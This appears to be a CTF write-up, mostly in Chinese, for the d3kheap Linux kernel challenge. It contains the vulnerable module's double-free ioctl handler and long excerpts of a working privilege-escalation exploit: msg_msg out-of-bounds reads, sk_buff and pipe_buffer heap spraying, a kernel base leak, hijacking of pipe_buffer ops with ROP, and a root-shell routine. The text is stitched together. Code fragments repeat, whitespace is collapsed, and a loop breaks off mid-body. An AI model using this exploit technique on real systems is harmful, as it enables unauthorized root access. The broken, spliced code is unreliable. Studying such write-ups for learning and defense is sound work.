/*
 * Command dispatch of the d3kheap device (excerpt from its ioctl handler).
 *
 * OBJ_ADD  - allocates the single 1024-byte buffer `buf` unless one is
 *            already recorded, and increments `ref_count`.
 * OBJ_EDIT - not implemented; only logs.
 * OBJ_SHOW - not implemented; only logs.
 * OBJ_DEL  - decrements `ref_count` and frees `buf`.
 *
 * NOTE(review): `buf` is not reset after kfree(), so it keeps pointing at
 * the freed object. A later OBJ_DEL therefore passes the `!buf` check and
 * frees the same object again whenever `ref_count` is still non-zero. The
 * initial value of `ref_count` is not visible in this excerpt.
 */
switch (cmd) {
case OBJ_ADD:
    /* Only one buffer may exist at a time. */
    if (buf) {
        printk(KERN_ALERT "[d3kheap:] You already had a buffer!");
        break;
    }
    /* NOTE(review): the kmalloc() result is not checked before counting it. */
    buf = kmalloc(1024, GFP_KERNEL);
    ref_count++;
    printk(KERN_INFO "[d3kheap:] Alloc done.\n");
    break;
case OBJ_EDIT:
    printk(KERN_ALERT "[d3kheap:] Function not completed yet, because I\'m a pigeon!");
    break;
case OBJ_SHOW:
    printk(KERN_ALERT "[d3kheap:] Function not completed yet, because I\'m a pigeon!");
    break;
case OBJ_DEL:
    if (!buf) {
        printk(KERN_ALERT "[d3kheap:] You don\'t had a buffer!");
        break;
    }
    /* The counter is the only guard against freeing twice. */
    if (!ref_count) {
        printk(KERN_ALERT "[d3kheap:] The buf already free!");
        break;
    }
    ref_count--;
    /* `buf` still holds the stale address after this call. */
    kfree(buf);
    printk(KERN_INFO "[d3kheap:] Free done.\n");
    break;
default:
    printk(KERN_ALERT "[d3kheap:] Invalid instructions.\n");
    break;
}
现在我们有了「写的原语」,接下来我们要寻找「读的原语」。在 Linux kernel 中有着一组 System V 消息队列相关的系统调用:
msgget:创建一个消息队列
msgsnd:向指定消息队列发送消息
msgrcv:从指定消息队列接收消息
当我们创建一个消息队列时,在内核空间中会创建这样一个结构体,其表示一个消息队列:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
/* one msq_queue structure for each present queue on the system */ structmsg_queue { structkern_ipc_permq_perm; time64_t q_stime; /* last msgsnd time */ time64_t q_rtime; /* last msgrcv time */ time64_t q_ctime; /* last change time */ unsignedlong q_cbytes; /* current number of bytes on queue */ unsignedlong q_qnum; /* number of messages in queue */ unsignedlong q_qbytes; /* max number of bytes on queue */ structpid *q_lspid;/* pid of last msgsnd */ structpid *q_lrpid;/* last receive pid */
/* one msg_msg structure for each message */ structmsg_msg { structlist_headm_list; long m_type; size_t m_ts; /* message text size */ structmsg_msgseg *next; void *security; /* the actual message follows immediately */ };
/*
 * MSG_COPY handling in the message-receive path (two excerpts; the code
 * between them is elided with "//...").
 */
if (msgflg & MSG_COPY) {
    /* MSG_COPY is rejected together with MSG_EXCEPT, and requires IPC_NOWAIT. */
    if ((msgflg & MSG_EXCEPT) || !(msgflg & IPC_NOWAIT))
        return -EINVAL;
    /* The size handed to prepare_copy() is capped at ns->msg_ctlmax. */
    copy = prepare_copy(buf, min_t(size_t, bufsz, ns->msg_ctlmax));
    if (IS_ERR(copy))
        return PTR_ERR(copy);
}
//...
/*
 * If we are copying, then do not unlink message and do
 * not update queue parameters.
 */
if (msgflg & MSG_COPY) {
    /* The queued message is replaced by the result of copy_msg(). */
    msg = copy_msg(msg, copy);
    goto out_unlock0;
}
//...
接下来我们考虑越界读取的详细过程,我们首先可以利用 setxattr 修改 msg_msg 的 next 指针为 NULL、将其 m_ts 改为 0x1000 - 0x30(在 next 指针为 NULL 的情况下,一个 msg_msg 结构体最大占用一张内存页的大小),从而越界读出内核堆上数据
接下来我们思考如何进行“合法”的搜索,我们先来看 copy_msg 的逻辑,其拷贝时判断待拷贝数据长度的逻辑主要是看 next 指针,因此若我们的 next 指针为一个非法地址,则会在解引用时导致 kernel panic
/**
 * struct pipe_buffer - a linux kernel pipe buffer
 * @page: the page containing the data for the pipe buffer
 * @offset: offset of data inside the @page
 * @len: length of data inside the @page
 * @ops: operations associated with this buffer. See @pipe_buf_operations.
 * @flags: pipe buffer flags. See above.
 * @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};
/*
 * Peek at the message in queue ms_qid[0] with MSG_COPY, asking for up to
 * 0x2000 - 0x30 bytes, then take one word of the returned data as
 * `kmsg_addr` and derive `fake_ops_addr` from it.
 * NOTE(review): assumes `buf` is an array of 8-byte words, since the index
 * is computed by dividing a byte offset by 8 - confirm against its
 * declaration.
 */
ret = msgrcv(ms_qid[0], buf, 0x2000 - 0x30, 0, IPC_NOWAIT | MSG_NOERROR | MSG_COPY);
if (ret < 0) {
    puts("[x] msgrcv!");
    exit(-1);
}
/* Second word located past byte offset 0x1000 - 0x30 of the received data. */
kmsg_addr = buf[(0x1000 - 0x30) / 8 + 1];
/* Disabled debug dump of the words between offsets 0x1000 - 0x30 and 0x2000 - 0x30:
puts("[*] leaking...");
for (int i = (0x1000 - 0x30) / 8; i < (0x2000 - 0x30) / 8 ; i++)
    printf("[----data dump----] %d: %p\n", i, buf[i]);*/
fake_ops_addr = kmsg_addr - fake_ops_offset;
printf("[+] UAF as fake ops addr at: %p, cal by msg idx: %d at addr: %p\n", fake_ops_addr, kmsg_idx, kmsg_addr);
// leak kernel text base if we didn't leak it before kernel_heap_search = kmsg_addr - 8; for (int leaking_times = 0; !kernel_text_leak; leaking_times++) { printf("[*] per leaking, no.%d time(s)\n", leaking_times);
msg_offset_count = 0; msg_offset = 0xdeadbeefbad4f00d; for (int i = (0x1000 - 0x30) / 8; i < (0x2000 - 0x30) / 8; i++) { printf("[----data dump----][%d] %p\n", i, buf[i]); if ((buf[i] > 0xffffffff81000000) && (buf[i] < 0xffffffffbfffffff) && !kernel_text_leak) { printf("[*] We got text leak! ktext: %p\n", buf[i]); kernel_offset = kernelLeakQuery(buf[i]); if (kernel_offset != 0xdeadbeef) { kernel_text_leak = buf[i]; kernel_base += kernel_offset; break; } } if (!buf[i]) msg_offset = msg_offset_count * 8; msg_offset_count++; }
if (kernel_text_leak) break;
if (msg_offset == 0xdeadbeefbad4f00d) { puts("[x] Failed to find next valid foothold!"); exit(EXIT_FAILURE); } kernel_heap_search += msg_offset; // to make the msg_msg->next == NULL, search from the last NULL }
// comfortably double free like A->B->A, its checking is as simple as the fastbin in ptmalloc2 ((struct msg_msg*) buf)->m_list.next = kernel_heap_search; // a pointer to the heap is available, list_del (aka unlink) is easy to pass ((struct msg_msg*) buf)->m_list.prev = kernel_heap_search; ((struct msg_msg*) buf)->m_type = NULL; ((struct msg_msg*) buf)->m_ts = 1024 - 0x30; ((struct msg_msg*) buf)->next = NULL; ((struct msg_msg*) buf)->security = NULL;
// while the kmem_cache->offset is not 0, we can easily repair the header of msg_msg setxattr("/tmp/exp", "arttnba3", buf, 0x2e0, 0);
ret = msgrcv(ms_qid[kmsg_idx], buf, 1024 - 0x30, 0, IPC_NOWAIT | MSG_NOERROR); // add a obj to pass detection in set_freepointer() in free_msg if (ret < 0) { puts("[x] msgrcv!"); return-1; }
/* one msg_msg structure for each message */ structmsg_msg { structlist_headm_list; long m_type; size_t m_ts; /* message text size */ structmsg_msgseg *next; void *security; /* the actual message follows immediately */ };
/**
 * struct pipe_buffer - a linux kernel pipe buffer
 * @page: the page containing the data for the pipe buffer
 * @offset: offset of data inside the @page
 * @len: length of data inside the @page
 * @ops: operations associated with this buffer. See @pipe_buf_operations.
 * @flags: pipe buffer flags. See above.
 * @private: private data owned by the ops.
 **/
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};
/* Descriptor of the vulnerable device; used by the ioctl() wrappers. */
long dev_fd;

/* Pipe descriptor storage. */
int pipe_fd[2];
int pipe_fd2[2];
int pipe_fd_1;

/*
 * Payload buffer for the sk_buff spray.
 * skb_shared_info occupies 320 bytes at the tail of the allocation,
 * which leaves 1024 - 320 = 704 bytes for the data we send.
 */
char fake_secondary_msg[704];
/* Issue the OBJ_ADD command to the device behind dev_fd. */
void add(void)
{
    ioctl(dev_fd, OBJ_ADD);
}
/* Issue the OBJ_DEL command to the device behind dev_fd. */
void del(void)
{
    ioctl(dev_fd, OBJ_DEL);
}
/* Register values captured by saveStatus(). */
size_t user_cs;
size_t user_ss;
size_t user_sp;
size_t user_rflags;
/*
 * Record cs, ss, rsp and rflags in user_cs, user_ss, user_sp and
 * user_rflags, then print a confirmation line.
 * NOTE(review): the operand order (destination first) assumes the file is
 * built with Intel-syntax inline assembly - confirm the build flags.
 */
void saveStatus(void)
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
    printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}
/*
 * Write `size` bytes from `buf` into end [0] of every socket pair,
 * SK_BUFF_NUM times per pair.
 *
 * Returns 0 when every write() succeeded, or -1 as soon as one fails.
 */
int spraySkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int i = 0; i < SOCKET_NUM; i++) {
        for (int j = 0; j < SK_BUFF_NUM; j++) {
            if (write(sk_socket[i][0], buf, size) < 0)
                return -1;
        }
    }

    return 0;
}
/*
 * Read up to `size` bytes into `buf` from end [1] of every socket pair,
 * SK_BUFF_NUM times per pair. Each read overwrites `buf`.
 *
 * Returns 0 when every read() succeeded, or -1 as soon as one fails.
 */
int freeSkBuff(int sk_socket[SOCKET_NUM][2], void *buf, size_t size)
{
    for (int i = 0; i < SOCKET_NUM; i++) {
        for (int j = 0; j < SK_BUFF_NUM; j++) {
            if (read(sk_socket[i][1], buf, size) < 0)
                return -1;
        }
    }

    return 0;
}
/*
 * Start /bin/sh if the process is running as uid 0; otherwise report the
 * failure through errExit().
 */
void getRootShell(void)
{
    /* getuid() is non-zero for any user other than root. */
    if (getuid())
        errExit("failed to gain the root!");

    printf("\033[32m\033[1m[+] Succesfully gain the root privilege, trigerring root shell now...\033[0m\n");
    system("/bin/sh");
}
intmain(int argc, char **argv, char **envp) { int oob_pipe_fd[2]; int sk_sockets[SOCKET_NUM][2]; int pipe_fd[PIPE_NUM][2]; int msqid[MSG_QUEUE_NUM]; int victim_qid, real_qid; structmsg_msg *nearby_msg; structmsg_msg *nearby_msg_prim; structpipe_buffer *pipe_buf_ptr; structpipe_buf_operations *ops_ptr; uint64_t victim_addr; uint64_t kernel_base; uint64_t kernel_offset; uint64_t *rop_chain; int rop_idx; cpu_set_t cpu_set;
saveStatus();
/* * Step.O * Initialization */
// run the exp on specific core only CPU_ZERO(&cpu_set); CPU_SET(0, &cpu_set); sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
// socket pairs to spray sk_buff for (int i = 0; i < SOCKET_NUM; i++) if (socketpair(AF_UNIX, SOCK_STREAM, 0, sk_sockets[i]) < 0) errExit("failed to create socket pair!");
dev_fd = open("/dev/d3kheap", O_RDONLY);
/* * Step.I * build msg_queue, spray primary and secondary msg_msg, * and use OOB write to construct the overlapping */ puts("\n\033[34m\033[1m[*] Step.I spray msg_msg, construct overlapping object\033[0m");
puts("[*] Build message queue..."); // build 4096 message queue for (int i = 0; i < MSG_QUEUE_NUM; i++) { if ((msqid[i] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) < 0) errExit("failed to create msg_queue!"); }
puts("[*] Spray primary and secondary msg_msg...");
// free the victim secondary msg_msg, then we get a UAF puts("[*] Trigger UAF..."); del();
// spray sk_buff to mark the UAF msg_msg puts("[*] spray sk_buff..."); buildMsg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", *(uint64_t*)"arttnba3", SECONDARY_MSG_SIZE, 0, 0); if (spraySkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to spray sk_buff!");
// find out the UAF queue victim_qid = -1; for (int i = 0; i < MSG_QUEUE_NUM; i++) { /* * the msg_msg got changed, so we can't read out * but it tells us which one the victim is */ if (peekMsg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0) { printf("[+] victim qid: %d\n", i); victim_qid = i; } }
if (victim_qid == -1) errExit("failed to make the UAF in msg queue!");
if (freeSkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
puts("\033[32m\033[1m[+] UAF construction complete!\033[0m");
/* * Step.III * spray sk_buff to leak msg_msg addr * construct fake msg_msg to leak addr of UAF obj */ puts("\n\033[34m\033[1m[*] Step.III spray sk_buff to leak kheap addr\033[0m");
// use fake msg_msg to read OOB puts("[*] OOB read from victim msg_msg"); if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0) errExit("failed to read victim msg!");
if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE] != MSG_TAG) errExit("failed to rehit the UAF object!");
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m%llx\n", nearby_msg->m_list.prev);
// release and re-spray sk_buff to construct fake msg_msg // so that we can make an arbitrary read on a primary msg_msg if (freeSkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
puts("[*] arbitrary read on primary msg of msg nearby victim"); if (peekMsg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0) errExit("failed to read victim msg!");
if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG) errExit("failed to rehit the UAF object!");
// cal the addr of UAF obj by the header we just read out nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)]; victim_addr = nearby_msg_prim->m_list.next - 0x400;
printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m%llx\n", nearby_msg_prim->m_list.next); printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m%llx\n", victim_addr);
/* * Step.IV * fix the header of UAF obj and release it * spray pipe_buffer and leak the kernel base */ puts("\n\033[34m\033[1m[*] Step.IV spray pipe_buffer to leak kernel base\033[0m");
// re-construct the msg_msg to fix it puts("[*] fixing the UAF obj as a msg_msg..."); if (freeSkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
memset(fake_secondary_msg, 0, sizeof(fake_secondary_msg)); buildMsg((struct msg_msg *)fake_secondary_msg, victim_addr + 0x800, victim_addr + 0x800, // a valid kheap addr is valid VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0); if (spraySkBuff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to spray sk_buff!");
// release UAF obj as secondary msg puts("[*] release UAF obj in message queue..."); if (readMsg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0) errExit("failed to receive secondary msg!");
// spray pipe_buffer puts("[*] spray pipe_buffer..."); for (int i = 0; i < PIPE_NUM; i++) { if (pipe(pipe_fd[i]) < 0) errExit("failed to create pipe!");
// write something to activate it if (write(pipe_fd[i][1], "arttnba3", 8) < 0) errExit("failed to write the pipe!"); }
// release the sk_buff to read pipe_buffer, leak kernel base puts("[*] release sk_buff to read pipe_buffer..."); pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg; for (int i = 0; i < SOCKET_NUM; i++) { for (int j = 0; j < SK_BUFF_NUM; j++) { if (read(sk_sockets[i][1], &fake_secondary_msg, sizeof(fake_secondary_msg)) < 0) errExit("failed to release sk_buff!");
/* * Step.V * hijack the ops of pipe_buffer * free all pipe to trigger fake ptr * so that we hijack the RIP * construct a ROP on pipe_buffer */ puts("\n\033[34m\033[1m[*] Step.V hijack the ops of pipe_buffer, gain root privilege\033[0m");
puts("[*] pre-construct data in userspace..."); pipe_buf_ptr = (struct pipe_buffer *) fake_secondary_msg; pipe_buf_ptr->page = *(uint64_t*) "arttnba3"; pipe_buf_ptr->ops = victim_addr + 0x100;
This is a standard kernel pwn challenge. We are given an unprivileged shell in a Linux VM, and the flag can only be read by root. The VM loads a vulnerable kernel module, which we have to exploit to gain root privileges and read the flag.